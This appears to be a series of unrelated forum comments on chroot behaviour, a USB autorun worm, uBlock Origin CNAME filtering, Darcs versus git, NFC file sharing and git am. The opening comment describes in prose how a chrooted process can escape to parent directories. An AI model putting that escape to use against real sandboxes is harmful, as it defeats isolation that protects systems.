chroot doesn't nest, there is only one chroot active for a given process at a given moment. If you're inside a chrooted environment and call chroot on a subdirectory without entering it, you regain the access to the parent directories.
which is why before fs namespaces, as part of security research prototype work I did, I created a "chroot aware" (not quite, but close enough for this context to use that term), that wouldn't let one walk past certain directories (i.e. lookup() would fail for them, no matter what permissions the user had once one entered "pseudo namespace" mode via this chroot mechanism). Was very easy to accomplish, but also very much a hack that fs namespaces are much better for.
AFAIK it only worked with optical drives, not pendrives. I've spent hours trying to get this functionality on my pendrives back in the day, to no avail (thankfully!). It was on Windows XP, and Windows 98 needed external drivers to even use pendrives at all, so if such an attack vector existed, it must have been on Windows 2000 or Me (i.e between XP and 98), so an arguably very short time frame (if at all!).
I don't remember the whole details, but I believe it installed an autorun.inf file on all USB drives so that inserting the drive on another PC would install it automatically.
The title seems to be wrong, uBlock Origin supported it for many years at this point (only on Firefox). This seems to be a refactor of that code, not a whole new feature.
It sounds to me like more than just a refactor, it now allows blocking based on ip earlier, before the request is actually made. Although, that isn't perfect because it doesn't know which ip address the browser will choose if there are multiple ips for a single domain.
Ok, I've reverted the title to that of the page. Submitted title was "uBlock Origin supports filtering CNAME cloaking sites on Firefox now". If someone wants to suggest a more accurate and neutral title, we can change it again. Github commits without additional context don't usually make for great HN threads though...
It's usually run as a local web application with the browser running on the same machine as the backend, though it's possible to bind it to non-localhost interfaces.
One more point I'd add to (2): given its massive inertia / network effect, the tooling and the resources are leagues ahead of everything else. I'm using Darcs for a few personal projects and while the core ideas are great, the tooling is just worse. From the ways to customize the diff utilities to use, to integrations with text editors (the vc-darcs module for Emacs is pretty barebones, especially compared to Magit, but even compared to the basic vc-git).
Darcs is a name that always makes me a little nostalgic, it was such an obvious idea of approaching a VC system. Unfortunately when I used it 10+ years ago we did hit the "merge of doom" problem too often.
I was sorry to see it go away, but mercurial took over for a while, and then later I switched to git because everybody else had done so.
ISTR around something like the Galaxy Nexus Google doing demos of beaming files between devices via WiFi Direct after having exchanged info with an NFC tap.
But that was just before they decided everything had to go via their cloud.
Curiously if you used a London bus in around 2005 with bluetooth on you would experience a lot of files being sent to you via ad hoc networks.
This works only under the assumption Github won't change the current DNS setup that happens to work this way. A trivial example would be adding a record for the specific subdomain one used directing it to some completely different IP address. Not something I'd be willing to bet on, especially considering the much cleaner solution from the original post.
A minor correction: it's usually preferable to apply commits with `git am` instead of `git apply`, as it applies the commit with all its metadata, not just the diff.